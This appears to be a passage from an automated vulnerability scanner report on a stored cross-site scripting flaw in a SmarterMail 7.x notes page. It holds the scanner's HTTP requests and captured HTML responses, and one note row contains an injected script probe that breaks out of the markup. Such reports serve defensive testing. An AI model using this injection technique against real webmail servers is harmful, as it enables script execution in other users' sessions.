There are a number of pre-defined, well-structured white-list libraries available for many different environments; OWASP Reform and the Microsoft Anti-Cross Site Scripting library are good examples.

Remedy References

External References

- /Main/frmNotes.aspx

/Main/frmNotes.aspx

http://vulnerable.smartermail.7.x.host:9998/Main/frmNotes.aspx

Injection URL

http://vulnerable.smartermail.7.x.host:9998/Main/frmNotes.aspx

Injection Request

GET /Main/frmNotes.aspx HTTP/1.1
Referer: http://vulnerable.smartermail.7.x.host:9998/Main/frmNote.aspx
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; CloudScan Vulnerability Crawler http://cloudscan.me)
Cache-Control: no-cache
Host: vulnerable.smartermail.7.x.host:9998
Cookie: ASP.NET_SessionId=e25dkk45nuvkgrr4d1exuxrn; SelectedLanguage=en
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Identification Request

GET /Main/frmNotes.aspx HTTP/1.1
Referer: http://vulnerable.smartermail.7.x.host:9998/Main/frmNote.aspx
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; CloudScan Vulnerability Crawler http://cloudscan.me)
Cache-Control: no-cache
Host: vulnerable.smartermail.7.x.host:9998
Cookie: ASP.NET_SessionId=e25dkk45nuvkgrr4d1exuxrn; SelectedLanguage=en
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Injection Response

HTTP/1.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Sun, 03 Oct 2010 06:20:28 GMT
X-AspNet-Version: 2.0.50727
Content-Encoding:
X-Compressed-By: HttpCompress
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 10797
Connection: Close




<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
My Notes - hoytllc.com - SmarterMail
</title><meta http-equiv="Page-Enter" content="blendTrans(Duration=0)" /><meta http-equiv="Page-Exit" content="blendTrans(Duration=0)" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&amp;fileMask=Main/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&amp;fileMask=Mail/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&amp;fileMask=Telerik&amp;rtl=false" rel="stylesheet" type="text/css" />
<!--[if lte IE 6]>
<style type="text/css">@import '/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&fileMask=BrowserOverrides/ie6&rtl=false';</style>
<![endif]-->
<meta http-equiv="cache-control" content="no-cache"><meta http-equiv="pragma" content="no-cache"></head>
<body class="" dir="ltr">
<form method="post" action="frmNotes.aspx" id="aspnetForm">
<div>
<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
<input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="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" />
</div>

<script type="text/javascript">
//<![CDATA[
var theForm = document.forms['aspnetForm'];
if (!theForm) {
theForm = document.aspnetForm;
}
function __doPostBack(eventTarget, eventArgument) {
if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
theForm.__EVENTTARGET.value = eventTarget;
theForm.__EVENTARGUMENT.value = eventArgument;
theForm.submit();
}
}
//]]>
</script>


<script src="/WebResource.axd?d=lFfe_wSSLYBiWo0hdQTqNA2&amp;t=633802452069218315" type="text/javascript"></script>


<script src="/ScriptResource.axd?d=9LtTppofNdzfPwjqAv6ngOF_m3Ok_PFqwhuv90rOoA_SHM2fVCRbipJCEnE9OMFtjNNZaXF1BttRFjWpHbAPstnprDdIVLeDszcVmLsdfwM1&amp;t=ffffffff8fb8c655" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=PkU8JqZ1AqOnNUfS9wB-O8XFAfH3kdpAehi09BJok9KiMBXqeEWZLvdsdUFLbPxYAD0iIeAHZBtPh1mybNd0fzbzD1H1EGEbNX_3WW4l9J01&amp;t=ffffffffec2d9970" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=PkU8JqZ1AqOnNUfS9wB-O8XFAfH3kdpAehi09BJok9KiMBXqeEWZLvdsdUFLbPxYxlutgliktFrtyUOE-2vtH5p7RzBBFeKiwavJVGKo3xk1&amp;t=ffffffffec2d9970" type="text/javascript"></script>

<script type="text/javascript">
self.EnableAnimations = false;
</script>

<script type="text/javascript" src="/App_Themes/Default/Javascript/JavaScript.ashx?guid=1CB60CF5B830100_1.6.3925.24513_&fileMask="></script>
<script type="text/javascript">
//<![CDATA[
Sys.WebForms.PageRequestManager._initialize('ctl00$ScriptManager1', document.getElementById('aspnetForm'));
Sys.WebForms.PageRequestManager.getInstance()._updateControls(['tctl00$UpdatePanel1','tctl00$MPH$UP1','tctl00$NavPH$UpdatePanel2','tctl00$CntPH$UpdatePanel3'], ['ctl00$BPH$DeleteIcon','ctl00$SPH$btnGo','ctl00$SPH$btnClear'], [], 90);
//]]>
</script>


<div id="ctl00_TitleBar_HeaderPanel" class="PageTitle">
<div class="RoundedPageTitleLeft">
<div id="PageTitle" class="PageTitleText">
My Notes
</div>
</div>
</div>

<div id="ctl00_ButtonRow" class="ButtonBar">
<div class="ButtonBarLeft">

<div id="ctl00_BPH_btnAddNote" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick="OpenNewMessage('frmNote.aspx?ret=1&popup=true', 600, 500);; return false;"><span class="BBInner">New</span></a></div>
<div id="ctl00_BPH_EditIcon" class="BBButton"><a class="ButtonBarAnchor" href="#" tabindex='0' onclick="DoEdit_ctl00_BPH_EditIcon(); return false;"><span class="BBInner">Edit</span></a></div>
<div id="ctl00_BPH_DeleteIcon" class="BBButton"><a class="ButtonBarAnchor" href="#" tabindex='0' onclick="DoDeleteQuery_ctl00_BPH_DeleteIcon(); return false;"><span class="BBInner">Delete</span></a></div>
<div id="ctl00_BPH_btnShowHideSearchBar" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick="ToggleSearch();; return false;"><span class="BBInner">Search</span></a></div>

</div>
<div class="ButtonBarRight">


</div>
<div class="ButtonBarClear">
<div class="ie6fix">
&nbsp;</div>
</div>
</div>
<div id="ctl00_SearchRow" class="SearchRow" style="display:none;">

<table class="SearchContents">
<tr>
<td class="SCText">
Search
<input name="ctl00$SPH$txtSearchString" type="text" id="ctl00_SPH_txtSearchString" OnKeyPress="return EnterHandler(event, function(){__doPostBack('ctl00$SPH$btnGo','')});" />
<select name="ctl00$SPH$lstColors" id="ctl00_SPH_lstColors" OnKeyPress="return EnterHandler(event, function(){__doPostBack('ctl00$SPH$btnGo','')});">
<option value="">All Colors</option>
<option value="white">White</option>
<option value="yellow">Yellow</option>
<option value="pink">Pink</option>
<option value="green">Green</option>
<option value="blue">Blue</option>

</select>
<select name="ctl00$SPH$lstCategories" id="ctl00_SPH_lstCategories" OnKeyPress="return EnterHandler(event, function(){__doPostBack('ctl00$SPH$btnGo','')});">
<option selected="selected" value="">All Categories</option>
<option value=" ">No Category</option>
<option value="1">1</option>

</select>
</td>
<td class="SCButtons">
<div id="ctl00_SPH_btnGo" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick=" __doPostBack('ctl00$SPH$btnGo',''); return false;"><span class="BBInner">Find Now</span></a></div>

<script type="text/javascript">
window.setInterval("if (invalid) { invalid = false; Refresh(); }", 333);
function Refresh() { __doPostBack('ctl00$SPH$btnGo',''); }
function ClearText()
{
var el = document.getElementById('ctl00_SPH_txtSearchString');
if (el) el.value = "";
el = document.getElementById('ctl00_SPH_lstCategories');
if (el) el.selectedIndex = 0;
el = document.getElementById('ctl00_SPH_lstColors');
if (el) el.selectedIndex = 0;
}
function DoubleClick(newUrl, uid, isNew)
{
OpenUniqueNewMessage(newUrl, 600, 500, uid);
}
</script>

<div id="ctl00_SPH_btnClear" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick="ClearText(); __doPostBack('ctl00$SPH$btnClear',''); return false;"><span class="BBInner">Clear</span></a></div><script type='text/javascript'>ToggleSearchClear = function() { ClearText(); __doPostBack('ctl00$SPH$btnClear',''); return false; }</script>
</td>
</tr>
</table>

</div>


<span id="ctl00_UpdatePanel1">

</span>

<div id="Scrollable" class="ContentDiv">

<span id="ctl00_MPH_HyperContextMenu1">
<!-- HyperMenu -->
<div class='hmMenuBar '><div class='hmScroller'><div class='hmScrollUp'></div><ul class='hmMenu hmMenuBar hmSub hmContext hmList' id='ctl00_MPH_ctl01' name='ctl00$MPH$ctl01' style='z-index:800'>
<li class='hmItem hmFirst' id='ctl00_MPH_ctl01_hm0' style='z-index: 800'><a class='hmA' href='#'>Edit</a></li>
<li class='hmItem hmLast' id='ctl00_MPH_ctl01_hm1' style='z-index: 800'><a class='hmA' href='#'>Delete</a></li>
</ul>
<div class='hmScrollDown'></div></div>
</div>
</span>
<div id="ctl00_MPH_UP1">


<div class="HyperGridWrapper" id="ctl00_MPH_HyperGrid1">
<div class="HyperGrid">
<table class="HyperGrid" id="ctl00_MPH_HyperGrid1_Table">
<thead>
<tr><th scope="col" class="showsel lc CheckBoxColumn" style="overflow: hidden"><input type="checkbox" id="ctl00_MPH_HyperGrid1CheckAll" name="ctl00$MPH$HyperGrid1CheckAll" /></th><th scope="col" class="SmallImage" style="overflow: hidden">&nbsp;</th><th scope="col" class="leftpad" style="overflow: hidden"><a class='SortableHeader' href="javascript:__doPostBack('ctl00$MPH$HyperGrid1','sort=text')">Note</a></th><th scope="col" class="rc leftpad" style="overflow: hidden"><a class='SortableHeader' href="javascript:__doPostBack('ctl00$MPH$HyperGrid1','sort=realdate')">Date<img src='/App_Themes/Default/Images/Misc/down.gif' /></a></th></tr>
</thead>
<tbody>
<tr class="firstrow"><td class="showsel lc CheckBoxColumn"><input type="checkbox" id="ctl00_MPH_HyperGrid1_CB64_OWQ2MGNiZjQyOTFiNGY3OWE4OTBlNTc1YzJhZWZhN2U-" name="ctl00_MPH_HyperGrid1_CB64_OWQ2MGNiZjQyOTFiNGY3OWE4OTBlNTc1YzJhZWZhN2U-" /></td><td class="SmallImage"><table class="NoteColor" cellSpacing="0" cellPadding="0" bgcolor="white" style="border:solid 1px gray" bordercolor="Black"><tr><td style="background-color: white;">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</td></tr></table></td><td class="leftpad">1</td><td class="rc leftpad">10/3/2010</td></tr>
<tr class="alt"><td class="showsel lc CheckBoxColumn"><input type="checkbox" id="ctl00_MPH_HyperGrid1_CB64_MGFhYWY2Yjg0YmM0NDJmYzk2NjE3NzQ1ZTQyZDc1ZDE-" name="ctl00_MPH_HyperGrid1_CB64_MGFhYWY2Yjg0YmM0NDJmYzk2NjE3NzQ1ZTQyZDc1ZDE-" /></td><td class="SmallImage"><table class="NoteColor" cellSpacing="0" cellPadding="0" bgcolor="white" style="border:solid 1px gray" bordercolor="Black"><tr><td style="background-color: white;">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</td></tr></table></td><td class="leftpad">1</td><td class="rc leftpad">10/3/2010</td></tr>
<tr><td class="showsel lc CheckBoxColumn"><input type="checkbox" id="ctl00_MPH_HyperGrid1_CB64_YWM2MDExYzZhODA5NGUxZTkyOTQ3ZDA1OTk5YTA2Y2E-" name="ctl00_MPH_HyperGrid1_CB64_YWM2MDExYzZhODA5NGUxZTkyOTQ3ZDA1OTk5YTA2Y2E-" /></td><td class="SmallImage"><table class="NoteColor" cellSpacing="0" cellPadding="0" bgcolor="white" style="border:solid 1px gray" bordercolor="Black"><tr><td style="background-color: white;">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</td></tr></table></td><td class="leftpad">'"--><script>netsparker(0x009625)</script></td><td class="rc leftpad">10/3/2010</td></tr>
<tr class="alt"><td class="showsel lc CheckBoxColumn"><input type="checkbox" id="ctl00_MPH_HyperGrid1_CB64_MWRjMzVlNjMyZGM0NGFlN2E2NWJhMzAwNGUyMzg1YzU-" name="ctl00_MPH_HyperGrid1_CB64_MWRjMzVlNjMyZGM0NGFlN2E2NWJhMzAwNGUyMzg1YzU-" /></td><td class="SmallImage"><table class="NoteColor" cellSpacing="0" cellPadding="0" bgcolor="white" style="border:solid 1px gray" bordercolor="Black"><tr><td style="background-color: white;">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</td></tr></table></td><td class="leftpad">1</td><td class="rc leftpad">10/3/2010</td></tr>
<tr><td class="showsel lc CheckBoxColumn"><input type="checkbox" id="ctl00_MPH_HyperGrid1_CB64_ZjRhYmEzZWU3NDlhNDk4Yzk4ZGRlM2MyMGFlZTNjMjQ-" name="ctl00_MPH_HyperGrid1_CB64_ZjRhYmEzZWU3NDlhNDk4Yzk4ZGRlM2MyMGFlZTNjMjQ-" /></td><td class="SmallImage"><table class="NoteColor" cellSpacing="0" cellPadding="0" bgcolor="white" style="border:solid 1px gray" bordercolor="Black"><tr><td style="background-color: white;">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</td></tr></table></td><td class="leftpad">1</td><td class="rc leftpad">10/3/2010</td></tr>
<tr class="alt"><td class="showsel lc CheckBoxColumn"><input type="checkbox" id="ctl00_MPH_HyperGrid1_CB64_YmYwMzMzMmIzNjU2NGE1YmE0MTMzNjVhYWM4NWM5MmU-" name="ctl00_MPH_HyperGrid1_CB64_YmYwMzMzMmIzNjU2NGE1YmE0MTMzNjVhYWM4NWM5MmU-" /></td><td class="SmallImage"><table class="NoteColor" cellSpacing="0" cellPadding="0" bgcolor="white" style="border:solid 1px gray" bordercolor="Black"><tr><td style="background-color: white;">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</td></tr></table></td><td class="leftpad">1</td><td class="rc leftpad">10/3/2010</td></tr>
<tr><td class="showsel lc CheckBoxColumn"><input type="checkbox" id="ctl00_MPH_HyperGrid1_CB64_M2EzYzllZmVhOGNiNDNhNGE4MWU0ZTM1NzZhMjk2Zjk-" name="ctl00_MPH_HyperGrid1_CB64_M2EzYzllZmVhOGNiNDNhNGE4MWU0ZTM1NzZhMjk2Zjk-" /></td><td class="SmallImage"><table class="NoteColor" cellSpacing="0" cellPadding="0" bgcolor="white" style="border:solid 1px gray" bordercolor="Black"><tr><td style="background-color: white;">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</td></tr></table></td><td class="leftpad">1</td><td class="rc leftpad">10/3/2010</td></tr>
<tr class="alt"><td class="showsel lc CheckBoxColumn"><input type="checkbox" id="ctl00_MPH_HyperGrid1_CB64_NTM3ZTU2MWQ0ODBiNGY5MDllYzk3ZTFjOTgwNDE5NDM-" name="ctl00_MPH_HyperGrid1_CB64_NTM3ZTU2MWQ0ODBiNGY5MDllYzk3ZTFjOTgwNDE5NDM-" /></td><td class="SmallImage"><table class="NoteColor" cellSpacing="0" cellPadding="0" bgcolor="white" style="border:solid 1px gray" bordercolor="Black"><tr><td style="background-color: white;">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</td></..

Identification Response

HTTP/1.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Sun, 03 Oct 2010 06:20:38 GMT
X-AspNet-Version: 2.0.50727
Content-Encoding:
X-Compressed-By: HttpCompress
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 10769
Connection: Close




<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
My Notes - hoytllc.com - SmarterMail
</title><meta http-equiv="Page-Enter" content="blendTrans(Duration=0)" /><meta http-equiv="Page-Exit" content="blendTrans(Duration=0)" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&amp;fileMask=Main/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&amp;fileMask=Mail/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&amp;fileMask=Telerik&amp;rtl=false" rel="stylesheet" type="text/css" />
<!--[if lte IE 6]>
<style type="text/css">@import '/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&fileMask=BrowserOverrides/ie6&rtl=false';</style>
<![endif]-->
<meta http-equiv="cache-control" content="no-cache"><meta http-equiv="pragma" content="no-cache"></head>
<body class="" dir="ltr">
<form method="post" action="frmNotes.aspx" id="aspnetForm">
<div>
<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
<input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwULLTExNDA1MDIwMjQPFggeCF9fX1RpdGxlBQhNeSBOb3Rlcx4QX19fUmVzdWx0RmFpbHVyZWUeEF9fX1Jlc3VsdFN1Y2Nlc3NlHgRfc0dGZxYCZg9kFgICAQ9kFgwCAw9kFgICAQ9kFgQCAQ8PFgQeC05hdmlnYXRlVVJMZR4XQ2xpZW50U2lkZVNjcmlwdE9uQ2xpY2sFOk9wZW5OZXdNZXNzYWdlKCdmcm1Ob3RlLmFzcHg/cmV0PTEmcG9wdXA9dHJ1ZScsIDYwMCwgNTAwKTtkZAIDDw8WAh4OTmF2aWdhdGVUYXJnZXQFC2RvdWJsZWNsaWNrZGQCBA8WAh4Fc3R5bGUFDWRpc3BsYXk6bm9uZTsWAgIBD2QWBgIBDw9kFgIeCk9uS2V5UHJlc3MFS3JldHVybiBFbnRlckhhbmRsZXIoZXZlbnQsIGZ1bmN0aW9uKCl7X19kb1Bvc3RCYWNrKCdjdGwwMCRTUEgkYnRuR28nLCcnKX0pO2QCAg8QD2QWAh8IBUtyZXR1cm4gRW50ZXJIYW5kbGVyKGV2ZW50LCBmdW5jdGlvbigpe19fZG9Qb3N0QmFjaygnY3RsMDAkU1BIJGJ0bkdvJywnJyl9KTsQFQYKQWxsIENvbG9ycwVXaGl0ZQZZZWxsb3cEUGluawVHcmVlbgRCbHVlFQYABXdoaXRlBnllbGxvdwRwaW5rBWdyZWVuBGJsdWUUKwMGZ2dnZ2dnZGQCAw8QD2QWAh8IBUtyZXR1cm4gRW50ZXJIYW5kbGVyKGV2ZW50LCBmdW5jdGlvbigpe19fZG9Qb3N0QmFjaygnY3RsMDAkU1BIJGJ0bkdvJywnJyl9KTsQFQMOQWxsIENhdGVnb3JpZXMLTm8gQ2F0ZWdvcnkBMRUDAAEgATEUKwMDZ2dnZGQCBg8WAh4HVmlzaWJsZWhkAgcPZBYCZg9kFgICAQ8WAh8JaBYCAgEPFgIeBFRleHRlZAIIDxYCHwloZAILD2QWAgIDD2QWAgIBD2QWAmYPZBYCAgEPDxYCHwoFDDEwNjMgbm90ZShzKWRkGAIFF2N0bDAwJE5hdlBIJEh5cGVyUGFnZXIxDwUgY3RsMDBfTVBIX0h5cGVyR3JpZDF8MjJ8MHw5fDUwfDBkBRRjdGwwMCRNUEgkSHlwZXJHcmlkMQ8FMVRydWV8VHJ1ZXx8RmFsc2V8VHJ1ZXxyZWFsZGF0ZSBkZXNjfEZhbHNlfEZhbHNlfDBkqwz7/J3W5eZFTmu+OETPYAkIws0=" />
</div>

<script type="text/javascript">
//<![CDATA[
var theForm = document.forms['aspnetForm'];
if (!theForm) {
theForm = document.aspnetForm;
}
function __doPostBack(eventTarget, eventArgument) {
if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
theForm.__EVENTTARGET.value = eventTarget;
theForm.__EVENTARGUMENT.value = eventArgument;
theForm.submit();
}
}
//]]>
</script>


<script src="/WebResource.axd?d=lFfe_wSSLYBiWo0hdQTqNA2&amp;t=633802452069218315" type="text/javascript"></script>


<script src="/ScriptResource.axd?d=9LtTppofNdzfPwjqAv6ngOF_m3Ok_PFqwhuv90rOoA_SHM2fVCRbipJCEnE9OMFtjNNZaXF1BttRFjWpHbAPstnprDdIVLeDszcVmLsdfwM1&amp;t=ffffffff8fb8c655" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=PkU8JqZ1AqOnNUfS9wB-O8XFAfH3kdpAehi09BJok9KiMBXqeEWZLvdsdUFLbPxYAD0iIeAHZBtPh1mybNd0fzbzD1H1EGEbNX_3WW4l9J01&amp;t=ffffffffec2d9970" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=PkU8JqZ1AqOnNUfS9wB-O8XFAfH3kdpAehi09BJok9KiMBXqeEWZLvdsdUFLbPxYxlutgliktFrtyUOE-2vtH5p7RzBBFeKiwavJVGKo3xk1&amp;t=ffffffffec2d9970" type="text/javascript"></script>

<script type="text/javascript">
self.EnableAnimations = false;
</script>

<script type="text/javascript" src="/App_Themes/Default/Javascript/JavaScript.ashx?guid=1CB60CF5B830100_1.6.3925.24513_&fileMask="></script>
<script type="text/javascript">
//<![CDATA[
Sys.WebForms.PageRequestManager._initialize('ctl00$ScriptManager1', document.getElementById('aspnetForm'));
Sys.WebForms.PageRequestManager.getInstance()._updateControls(['tctl00$UpdatePanel1','tctl00$MPH$UP1','tctl00$NavPH$UpdatePanel2','tctl00$CntPH$UpdatePanel3'], ['ctl00$BPH$DeleteIcon','ctl00$SPH$btnGo','ctl00$SPH$btnClear'], [], 90);
//]]>
</script>


<div id="ctl00_TitleBar_HeaderPanel" class="PageTitle">
<div class="RoundedPageTitleLeft">
<div id="PageTitle" class="PageTitleText">
My Notes
</div>
</div>
</div>

<div id="ctl00_ButtonRow" class="ButtonBar">
<div class="ButtonBarLeft">

<div id="ctl00_BPH_btnAddNote" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick="OpenNewMessage('frmNote.aspx?ret=1&popup=true', 600, 500);; return false;"><span class="BBInner">New</span></a></div>
<div id="ctl00_BPH_EditIcon" class="BBButton"><a class="ButtonBarAnchor" href="#" tabindex='0' onclick="DoEdit_ctl00_BPH_EditIcon(); return false;"><span class="BBInner">Edit</span></a></div>
<div id="ctl00_BPH_DeleteIcon" class="BBButton"><a class="ButtonBarAnchor" href="#" tabindex='0' onclick="DoDeleteQuery_ctl00_BPH_DeleteIcon(); return false;"><span class="BBInner">Delete</span></a></div>
<div id="ctl00_BPH_btnShowHideSearchBar" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick="ToggleSearch();; return false;"><span class="BBInner">Search</span></a></div>

</div>
<div class="ButtonBarRight">


</div>
<div class="ButtonBarClear">
<div class="ie6fix">
&nbsp;</div>
</div>
</div>
<div id="ctl00_SearchRow" class="SearchRow" style="display:none;">

<table class="SearchContents">
<tr>
<td class="SCText">
Search
<input name="ctl00$SPH$txtSearchString" type="text" id="ctl00_SPH_txtSearchString" OnKeyPress="return EnterHandler(event, function(){__doPostBack('ctl00$SPH$btnGo','')});" />
<select name="ctl00$SPH$lstColors" id="ctl00_SPH_lstColors" OnKeyPress="return EnterHandler(event, function(){__doPostBack('ctl00$SPH$btnGo','')});">
<option value="">All Colors</option>
<option value="white">White</option>
<option value="yellow">Yellow</option>
<option value="pink">Pink</option>
<option value="green">Green</option>
<option value="blue">Blue</option>

</select>
<select name="ctl00$SPH$lstCategories" id="ctl00_SPH_lstCategories" OnKeyPress="return EnterHandler(event, function(){__doPostBack('ctl00$SPH$btnGo','')});">
<option selected="selected" value="">All Categories</option>
<option value=" ">No Category</option>
<option value="1">1</option>

</select>
</td>
<td class="SCButtons">
<div id="ctl00_SPH_btnGo" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick=" __doPostBack('ctl00$SPH$btnGo',''); return false;"><span class="BBInner">Find Now</span></a></div>

<script type="text/javascript">
window.setInterval("if (invalid) { invalid = false; Refresh(); }", 333);
function Refresh() { __doPostBack('ctl00$SPH$btnGo',''); }
function ClearText()
{
var el = document.getElementById('ctl00_SPH_txtSearchString');
if (el) el.value = "";
el = document.getElementById('ctl00_SPH_lstCategories');
if (el) el.selectedIndex = 0;
el = document.getElementById('ctl00_SPH_lstColors');
if (el) el.selectedIndex = 0;
}
function DoubleClick(newUrl, uid, isNew)
{
OpenUniqueNewMessage(newUrl, 600, 500, uid);
}
</script>

<div id="ctl00_SPH_btnClear" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick="ClearText(); __doPostBack('ctl00$SPH$btnClear',''); return false;"><span class="BBInner">Clear</span></a></div><script type='text/javascript'>ToggleSearchClear = function() { ClearText(); __doPostBack('ctl00$SPH$btnClear',''); return false; }</script>
</td>
</tr>
</table>

</div>


<span id="ctl00_UpdatePanel1">

</span>

<div id="Scrollable" class="ContentDiv">

<span id="ctl00_MPH_HyperContextMenu1">
<!-- HyperMenu -->
<div class='hmMenuBar '><div class='hmScroller'><div class='hmScrollUp'></div><ul class='hmMenu hmMenuBar hmSub hmContext hmList' id='ctl00_MPH_ctl01' name='ctl00$MPH$ctl01' style='z-index:800'>
<li class='hmItem hmFirst' id='ctl00_MPH_ctl01_hm0' style='z-index: 800'><a class='hmA' href='#'>Edit</a></li>
<li class='hmItem hmLast' id='ctl00_MPH_ctl01_hm1' style='z-index: 800'><a class='hmA' href='#'>Delete</a></li>
</ul>
<div class='hmScrollDown'></div></div>
</div>
</span>
<div id="ctl00_MPH_UP1">


<div class="HyperGridWrapper" id="ctl00_MPH_HyperGrid1">
<div class="HyperGrid">
<table class="HyperGrid" id="ctl00_MPH_HyperGrid1_Table">
<thead>
<tr><th scope="col" class="showsel lc CheckBoxColumn" style="overflow: hidden"><input type="checkbox" id="ctl00_MPH_HyperGrid1CheckAll" name="ctl00$MPH$HyperGrid1CheckAll" /></th><th scope="col" class="SmallImage" style="overflow: hidden">&nbsp;</th><th scope="col" class="leftpad" style="overflow: hidden"><a class='SortableHeader' href="javascript:__doPostBack('ctl00$MPH$HyperGrid1','sort=text')">Note</a></th><th scope="col" class="rc leftpad" style="overflow: hidden"><a class='SortableHeader' href="javascript:__doPostBack('ctl00$MPH$HyperGrid1','sort=realdate')">Date<img src='/App_Themes/Default/Images/Misc/down.gif' /></a></th></tr>
</thead>
<tbody>
<tr class="firstrow"><td class="showsel lc CheckBoxColumn"><input type="checkbox" id="ctl00_MPH_HyperGrid1_CB64_NTQ3ZjE3ZGZhMjkxNDY2NTgwNWQyOTExZjA1NTE0ZTI-" name="ctl00_MPH_HyperGrid1_CB64_NTQ3ZjE3ZGZhMjkxNDY2NTgwNWQyOTExZjA1NTE0ZTI-" /></td><td class="SmallImage"><table class="NoteColor" cellSpacing="0" cellPadding="0" bgcolor="white" style="border:solid 1px gray" bordercolor="Black"><tr><td style="background-color: white;">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</td></tr></table></td><td class="leftpad">1</td><td class="rc leftpad">10/3/2010</td></tr>
<tr class="alt"><td class="showsel lc CheckBoxColumn"><input type="checkbox" id="ctl00_MPH_HyperGrid1_CB64_YmQwN2YyMjJkNDgyNDRmZmFhNmQ3MzEzMGNmMjM1NWU-" name="ctl00_MPH_HyperGrid1_CB64_YmQwN2YyMjJkNDgyNDRmZmFhNmQ3MzEzMGNmMjM1NWU-" /></td><td class="SmallImage"><table class="NoteColor" cellSpacing="0" cellPadding="0" bgcolor="white" style="border:solid 1px gray" bordercolor="Black"><tr><td style="background-color: white;">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</td></tr></table></td><td class="leftpad">1</td><td class="rc leftpad">10/3/2010</td></tr>
<tr><td class="showsel lc CheckBoxColumn"><input type="checkbox" id="ctl00_MPH_HyperGrid1_CB64_MTExNWM5OWZhMmE5NDhjYWI5MTY3Zjk3YmRlNTcxNjc-" name="ctl00_MPH_HyperGrid1_CB64_MTExNWM5OWZhMmE5NDhjYWI5MTY3Zjk3YmRlNTcxNjc-" /></td><td class="SmallImage"><table class="NoteColor" cellSpacing="0" cellPadding="0" bgcolor="white" style="border:solid 1px gray" bordercolor="Black"><tr><td style="background-color: white;">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</td></tr></table></td><td class="leftpad">1</td><td class="rc leftpad">10/3/2010</td></tr>
<tr class="alt"><td class="showsel lc CheckBoxColumn"><input type="checkbox" id="ctl00_MPH_HyperGrid1_CB64_ZGQxOGIwNWJjMjgzNDgyOWFlZjI4ZmJjMjA4ZGEwYzQ-" name="ctl00_MPH_HyperGrid1_CB64_ZGQxOGIwNWJjMjgzNDgyOWFlZjI4ZmJjMjA4ZGEwYzQ-" /></td><td class="SmallImage"><table class="NoteColor" cellSpacing="0" cellPadding="0" bgcolor="white" style="border:solid 1px gray" bordercolor="Black"><tr><td style="background-color: white;">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</td></tr></table></td><td class="leftpad">1</td><td class="rc leftpad">10/3/2010</td></tr>
